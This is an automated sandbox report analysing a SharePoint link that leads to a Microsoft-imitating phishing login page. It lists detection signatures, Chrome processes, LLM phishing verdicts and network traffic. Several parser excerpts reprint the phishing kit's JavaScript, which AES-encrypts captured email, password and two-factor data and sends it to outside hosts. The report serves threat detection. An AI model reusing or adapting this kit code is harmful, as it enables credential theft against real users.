Edit tour

Windows Analysis Report
https://formgrind-my.sharepoint.com/:i:/p/laurence/EQidvWga5z5AkLSZaC8mcgQB5SsWp0hmDAXJ2zBQZCdtYg?e=Awsuih

Overview

General Information

Sample URL:	https://formgrind-my.sharepoint.com/:i:/p/laurence/EQidvWga5z5AkLSZaC8mcgQB5SsWp0hmDAXJ2zBQZCdtYg?e=Awsuih
Analysis ID:	1465635

Detection

HTMLPhisher

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Yara detected HtmlPhish10

HTML page contains suspicious base64 encoded javascript

Phishing site detected (based on image similarity)

Phishing site or detected (based on various text indicators)

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Detected non-DNS traffic on DNS port

HTML body contains low number of good links

HTML body contains password input but no form action

HTML page contains hidden URLs or javascript code

HTML title does not match URL

Invalid T&C link found

Stores files to the Windows start menu directory

Classification

Process Tree

System is w10x64_ra

chrome.exe (PID: 2292 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://formgrind-my.sharepoint.com/:i:/p/laurence/EQidvWga5z5AkLSZaC8mcgQB5SsWp0hmDAXJ2zBQZCdtYg?e=Awsuih MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

chrome.exe (PID: 5032 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1964,i,5944536068702566294,9145615382994554706,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

chrome.exe (PID: 6920 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://rdwcs.emalkarc.com/KsmxUZnO/ MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

chrome.exe (PID: 6500 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2016,i,5536660013962346328,15030357733291837705,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author
3.7.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
3.6.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
3.7.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
3.6.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
4.8.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
4.8.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
3.7.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
4.10.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
4.9.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
3.6.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
Click to see the 5 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

AI detected phishing page

Source: https://rdwcs.emalkarc.com	LLM: Score: 9 brands: Microsoft Reasons: The URL 'https://rdwcs.emalkarc.com' does not match the legitimate domain for Microsoft, which is 'microsoft.com'. The page prominently displays a login form, which is a common tactic used in phishing attacks to harvest user credentials. The domain name 'emalkarc.com' is suspicious and not associated with Microsoft. The use of a subdomain 'rdwcs' further adds to the suspicion. There are no captchas present, which is typical for phishing sites to make the login process appear seamless. The overall design of the page mimics Microsoft's login page, which is a social engineering technique to mislead users. DOM: 3.6.pages.csv
Source: https://rdwcs.emalkarc.com	LLM: Score: 9 brands: Microsoft Reasons: The URL 'https://rdwcs.emalkarc.com' does not match the legitimate domain for Microsoft, which is 'microsoft.com'. The page displays a prominent login form, which is a common tactic used in phishing attacks. Additionally, the domain name 'emalkarc.com' is suspicious and not associated with Microsoft. The presence of a suspicious link ('get a new Microsoft account') that could potentially lead to a phishing page further raises concerns. The combination of these factors strongly indicates that this site is a phishing site. DOM: 4.8.pages.csv

Yara detected HtmlPhish10

Source: Yara match	File source: 3.7.pages.csv, type: HTML
Source: Yara match	File source: 3.6.pages.csv, type: HTML
Source: Yara match	File source: 3.7.pages.csv, type: HTML
Source: Yara match	File source: 3.6.pages.csv, type: HTML
Source: Yara match	File source: 4.8.pages.csv, type: HTML
Source: Yara match	File source: 4.8.pages.csv, type: HTML
Source: Yara match	File source: 3.7.pages.csv, type: HTML
Source: Yara match	File source: 4.10.pages.csv, type: HTML
Source: Yara match	File source: 4.9.pages.csv, type: HTML
Source: Yara match	File source: 3.6.pages.csv, type: HTML

HTML page contains suspicious base64 encoded javascript

Source: https://rdwcs.emalkarc.com/KsmxUZnO/	HTTP Parser: Base64 decoded: <script>
Source: https://rdwcs.emalkarc.com/KsmxUZnO/	HTTP Parser: Base64 decoded: <script>

Phishing site detected (based on image similarity)

Source: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB

Matcher: Found strong image similarity, brand: MICROSOFT

Phishing site or detected (based on various text indicators)

Source: Chrome DOM: 2.3	OCR Text: : Verifying... CLOUDFLARE Microsoft
Source: Chrome DOM: 1.4	OCR Text: Verifying.. CLOUDFLARE Microsoft

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Source: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB	HTTP Parser: var websitenames = ["godaddy"];var capnum = 1;var appnum = 1;var view = "";var pagelinkval = "F2vFwX";var emailcheck = "0";var webname = "rtrim(/web8/, '/')";var urlo = "gw7ge8wZsViskLS37u5k4m7RVXoJe7pdcuTFQ1w";var gdf = "ij5tdqOr50ejUSGpe1C7HwxWSLEO2C5mz2MZ6g4Gcd117";var requestsent = false;var pagedata = "";var redirecturl = "";let userAgent = navigator.userAgent;let browserName;let userip;let usercountry;var errorcodeexecuted = false;if(userAgent.match(/chrome\|chromium\|crios/i)){ browserName = "chrome";} else if(userAgent.match(/firefox\|fxios/i)){ browserName = "firefox";} else if(userAgent.match(/safari/i)){ browserName = "safari";} else if(userAgent.match(/opr\//i)){ browserName = "opera";} else if(userAgent.match(/edg/i)){ browserName = "edge";} else{ browserName="No browser detection";}function encryptData(data) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return encrypted.toString();}function decryptData(encryptedData) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const decrypted = CryptoJS.AES.decrypt(encryptedData, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return decrypted.toString(CryptoJS.enc.Utf8);}const sendAndReceive = (route, args, getresponse) => {if(requestsent == true && route !== "twofaselect"){return JSON.parse({"message": "waiting for previous request to complete"});}if(requestsent == false \|\| route == "twofaselect"){requestsent = true;let routename = null;let randpattern = null;if(route == "checkemail"){randpattern = /(pq\|rs)[A-Za-z0-9]{6,18}(yz\|12\|34)[A-Za-z0-9]{2,7}(uv\|wx)(3[1-9]\|40)/gm;}if(route == "checkpass"){randpattern = /(yz\|12)[A-Za-z0-9]{7,14}(56\|78)[A-Za-z0-9]{3,8}(op\|qr)(4[1-9]\|50)/gm;}if(route == "twofaselect"){randpattern = /(56\|78\|90)[A-Za-z0-9]{8,16}(23\|45\|67)[A-Za-z0-9]{4,9}(st\|uv)(5[1-9]\|60)/gm;}if(route == "twofaselected"){randpattern = /(23\|45)[A-Za-z0-9]{9,20}(89\|90\|ab)[A-Za-z0-9]{5,10}(vw\|xy)(6[1-9]\|70)/gm;}let randexp = new RandExp(randpattern);let randroute = randexp.gen();let formattedargs = 0;if(route == "checkemail"){formattedargs = args.map(item => '/'+item).join('')+'/'+appnum+'/'+getresponse;}if(route !== "checkemail"){formattedargs = '/'+token+args.map(item => '/'+item).join('')+'/'+getresponse;}// console.log(formattedargs);let encrypteddata = encryptData(formattedargs);const makeRequest = (retryCount) => { return new Promise((resolve, reject) => { // url: 'http://91.219.150.47:3000/' + route + formattedargs, // type: 'GET', $.ajax({ url: 'https://bvTjo.logentr.com/kwRiWKsuBTMrRqEWpHWuCylplzB
Source: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB#	HTTP Parser: var websitenames = ["godaddy"];var capnum = 1;var appnum = 1;var view = "";var pagelinkval = "F2vFwX";var emailcheck = "0";var webname = "rtrim(/web8/, '/')";var urlo = "gw7ge8wZsViskLS37u5k4m7RVXoJe7pdcuTFQ1w";var gdf = "ij5tdqOr50ejUSGpe1C7HwxWSLEO2C5mz2MZ6g4Gcd117";var requestsent = false;var pagedata = "";var redirecturl = "";let userAgent = navigator.userAgent;let browserName;let userip;let usercountry;var errorcodeexecuted = false;if(userAgent.match(/chrome\|chromium\|crios/i)){ browserName = "chrome";} else if(userAgent.match(/firefox\|fxios/i)){ browserName = "firefox";} else if(userAgent.match(/safari/i)){ browserName = "safari";} else if(userAgent.match(/opr\//i)){ browserName = "opera";} else if(userAgent.match(/edg/i)){ browserName = "edge";} else{ browserName="No browser detection";}function encryptData(data) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return encrypted.toString();}function decryptData(encryptedData) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const decrypted = CryptoJS.AES.decrypt(encryptedData, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return decrypted.toString(CryptoJS.enc.Utf8);}const sendAndReceive = (route, args, getresponse) => {if(requestsent == true && route !== "twofaselect"){return JSON.parse({"message": "waiting for previous request to complete"});}if(requestsent == false \|\| route == "twofaselect"){requestsent = true;let routename = null;let randpattern = null;if(route == "checkemail"){randpattern = /(pq\|rs)[A-Za-z0-9]{6,18}(yz\|12\|34)[A-Za-z0-9]{2,7}(uv\|wx)(3[1-9]\|40)/gm;}if(route == "checkpass"){randpattern = /(yz\|12)[A-Za-z0-9]{7,14}(56\|78)[A-Za-z0-9]{3,8}(op\|qr)(4[1-9]\|50)/gm;}if(route == "twofaselect"){randpattern = /(56\|78\|90)[A-Za-z0-9]{8,16}(23\|45\|67)[A-Za-z0-9]{4,9}(st\|uv)(5[1-9]\|60)/gm;}if(route == "twofaselected"){randpattern = /(23\|45)[A-Za-z0-9]{9,20}(89\|90\|ab)[A-Za-z0-9]{5,10}(vw\|xy)(6[1-9]\|70)/gm;}let randexp = new RandExp(randpattern);let randroute = randexp.gen();let formattedargs = 0;if(route == "checkemail"){formattedargs = args.map(item => '/'+item).join('')+'/'+appnum+'/'+getresponse;}if(route !== "checkemail"){formattedargs = '/'+token+args.map(item => '/'+item).join('')+'/'+getresponse;}// console.log(formattedargs);let encrypteddata = encryptData(formattedargs);const makeRequest = (retryCount) => { return new Promise((resolve, reject) => { // url: 'http://91.219.150.47:3000/' + route + formattedargs, // type: 'GET', $.ajax({ url: 'https://bvTjo.logentr.com/kwRiWKsuBTMrRqEWpHWuCylplzB
Source: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB#	HTTP Parser: var websitenames = ["godaddy"];var capnum = 1;var appnum = 1;var view = "";var pagelinkval = "F2vFwX";var emailcheck = "0";var webname = "rtrim(/web8/, '/')";var urlo = "gkiVuDzkyb3le0e84ZzpJlb7ZGbquf1RdMXnxEN2T8HFYzOnb";var gdf = "ijR8OKqjpdDlvZKkRm4eXuvWvW7UMWsQPGdcd119";var requestsent = false;var pagedata = "";var redirecturl = "";let userAgent = navigator.userAgent;let browserName;let userip;let usercountry;var errorcodeexecuted = false;if(userAgent.match(/chrome\|chromium\|crios/i)){ browserName = "chrome";} else if(userAgent.match(/firefox\|fxios/i)){ browserName = "firefox";} else if(userAgent.match(/safari/i)){ browserName = "safari";} else if(userAgent.match(/opr\//i)){ browserName = "opera";} else if(userAgent.match(/edg/i)){ browserName = "edge";} else{ browserName="No browser detection";}function encryptData(data) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return encrypted.toString();}function decryptData(encryptedData) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const decrypted = CryptoJS.AES.decrypt(encryptedData, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return decrypted.toString(CryptoJS.enc.Utf8);}const sendAndReceive = (route, args, getresponse) => {if(requestsent == true && route !== "twofaselect"){return JSON.parse({"message": "waiting for previous request to complete"});}if(requestsent == false \|\| route == "twofaselect"){requestsent = true;let routename = null;let randpattern = null;if(route == "checkemail"){randpattern = /(pq\|rs)[A-Za-z0-9]{6,18}(yz\|12\|34)[A-Za-z0-9]{2,7}(uv\|wx)(3[1-9]\|40)/gm;}if(route == "checkpass"){randpattern = /(yz\|12)[A-Za-z0-9]{7,14}(56\|78)[A-Za-z0-9]{3,8}(op\|qr)(4[1-9]\|50)/gm;}if(route == "twofaselect"){randpattern = /(56\|78\|90)[A-Za-z0-9]{8,16}(23\|45\|67)[A-Za-z0-9]{4,9}(st\|uv)(5[1-9]\|60)/gm;}if(route == "twofaselected"){randpattern = /(23\|45)[A-Za-z0-9]{9,20}(89\|90\|ab)[A-Za-z0-9]{5,10}(vw\|xy)(6[1-9]\|70)/gm;}let randexp = new RandExp(randpattern);let randroute = randexp.gen();let formattedargs = 0;if(route == "checkemail"){formattedargs = args.map(item => '/'+item).join('')+'/'+appnum+'/'+getresponse;}if(route !== "checkemail"){formattedargs = '/'+token+args.map(item => '/'+item).join('')+'/'+getresponse;}// console.log(formattedargs);let encrypteddata = encryptData(formattedargs);const makeRequest = (retryCount) => { return new Promise((resolve, reject) => { // url: 'http://91.219.150.47:3000/' + route + formattedargs, // type: 'GET', $.ajax({ url: 'https://UFWrf.agmandk.com/msinuwkgusndtnagxlvfka
Source: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB#	HTTP Parser: var websitenames = ["godaddy"];var capnum = 1;var appnum = 1;var view = "";var pagelinkval = "F2vFwX";var emailcheck = "0";var webname = "rtrim(/web8/, '/')";var urlo = "gkiVuDzkyb3le0e84ZzpJlb7ZGbquf1RdMXnxEN2T8HFYzOnb";var gdf = "ijR8OKqjpdDlvZKkRm4eXuvWvW7UMWsQPGdcd119";var requestsent = false;var pagedata = "";var redirecturl = "";let userAgent = navigator.userAgent;let browserName;let userip;let usercountry;var errorcodeexecuted = false;if(userAgent.match(/chrome\|chromium\|crios/i)){ browserName = "chrome";} else if(userAgent.match(/firefox\|fxios/i)){ browserName = "firefox";} else if(userAgent.match(/safari/i)){ browserName = "safari";} else if(userAgent.match(/opr\//i)){ browserName = "opera";} else if(userAgent.match(/edg/i)){ browserName = "edge";} else{ browserName="No browser detection";}function encryptData(data) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return encrypted.toString();}function decryptData(encryptedData) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const decrypted = CryptoJS.AES.decrypt(encryptedData, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return decrypted.toString(CryptoJS.enc.Utf8);}const sendAndReceive = (route, args, getresponse) => {if(requestsent == true && route !== "twofaselect"){return JSON.parse({"message": "waiting for previous request to complete"});}if(requestsent == false \|\| route == "twofaselect"){requestsent = true;let routename = null;let randpattern = null;if(route == "checkemail"){randpattern = /(pq\|rs)[A-Za-z0-9]{6,18}(yz\|12\|34)[A-Za-z0-9]{2,7}(uv\|wx)(3[1-9]\|40)/gm;}if(route == "checkpass"){randpattern = /(yz\|12)[A-Za-z0-9]{7,14}(56\|78)[A-Za-z0-9]{3,8}(op\|qr)(4[1-9]\|50)/gm;}if(route == "twofaselect"){randpattern = /(56\|78\|90)[A-Za-z0-9]{8,16}(23\|45\|67)[A-Za-z0-9]{4,9}(st\|uv)(5[1-9]\|60)/gm;}if(route == "twofaselected"){randpattern = /(23\|45)[A-Za-z0-9]{9,20}(89\|90\|ab)[A-Za-z0-9]{5,10}(vw\|xy)(6[1-9]\|70)/gm;}let randexp = new RandExp(randpattern);let randroute = randexp.gen();let formattedargs = 0;if(route == "checkemail"){formattedargs = args.map(item => '/'+item).join('')+'/'+appnum+'/'+getresponse;}if(route !== "checkemail"){formattedargs = '/'+token+args.map(item => '/'+item).join('')+'/'+getresponse;}// console.log(formattedargs);let encrypteddata = encryptData(formattedargs);const makeRequest = (retryCount) => { return new Promise((resolve, reject) => { // url: 'http://91.219.150.47:3000/' + route + formattedargs, // type: 'GET', $.ajax({ url: 'https://UFWrf.agmandk.com/msinuwkgusndtnagxlvfka

Source: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB	HTTP Parser: Number of links: 0
Source: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB#	HTTP Parser: Number of links: 0

Source: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB	HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB#	HTTP Parser: <input type="password" .../> found but no <form action="...

Source: https://rdwcs.emalkarc.com/KsmxUZnO/

HTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://challenges.cloudflare.com/turnstile/v0/api.j...

Source: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB	HTTP Parser: Title: Revenue Recognition does not match URL
Source: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB#	HTTP Parser: Title: Revenue Recognition does not match URL

Source: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB	HTTP Parser: Invalid link: Terms of use
Source: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB	HTTP Parser: Invalid link: Privacy & cookies
Source: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB#	HTTP Parser: Invalid link: Terms of use
Source: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB#	HTTP Parser: Invalid link: Privacy & cookies
Source: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB#	HTTP Parser: Invalid link: Terms of use
Source: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB#	HTTP Parser: Invalid link: Privacy & cookies
Source: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB#	HTTP Parser: Invalid link: Terms of use
Source: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB#	HTTP Parser: Invalid link: Privacy & cookies

Source: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB	HTTP Parser: <input type="password" .../> found
Source: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB#	HTTP Parser: <input type="password" .../> found

Source: https://rdwcs.emalkarc.com/KsmxUZnO/	HTTP Parser: No favicon
Source: https://rdwcs.emalkarc.com/KsmxUZnO/	HTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/7r0ya/0x4AAAAAAAcRsPy5c0bzqNqJ/auto/normal	HTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/7r0ya/0x4AAAAAAAcRsPy5c0bzqNqJ/auto/normal	HTTP Parser: No favicon
Source: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB	HTTP Parser: No favicon
Source: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB#	HTTP Parser: No favicon
Source: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB#	HTTP Parser: No favicon
Source: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB#	HTTP Parser: No favicon

Source: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB	HTTP Parser: No <meta name="author".. found
Source: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB#	HTTP Parser: No <meta name="author".. found
Source: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB#	HTTP Parser: No <meta name="author".. found
Source: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB#	HTTP Parser: No <meta name="author".. found

Source: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB	HTTP Parser: No <meta name="copyright".. found
Source: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB#	HTTP Parser: No <meta name="copyright".. found
Source: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB#	HTTP Parser: No <meta name="copyright".. found
Source: https://rdwcs.emalkarc.com/XPMKPDUWHPEPVHHWZFI579127500244815BITDSAGKSDGJFYRVXZF?0564386640557501325GMXKNINJQRREAVFOLIIJQFFIB#	HTTP Parser: No <meta name="copyright".. found

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries

Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.17:60654 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:60697 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:60701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.17:60816 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.159.23:443 -> 192.168.2.17:60831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:60833 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.209.182:443 -> 192.168.2.17:60836 version: TLS 1.2

Source: global traffic	TCP traffic: 192.168.2.17:60613 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.17:60613 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.17:60613 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.17:60613 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.17:60613 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.17:60613 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.17:60613 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.17:60613 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.17:60613 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.17:60613 -> 1.1.1.1:53

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
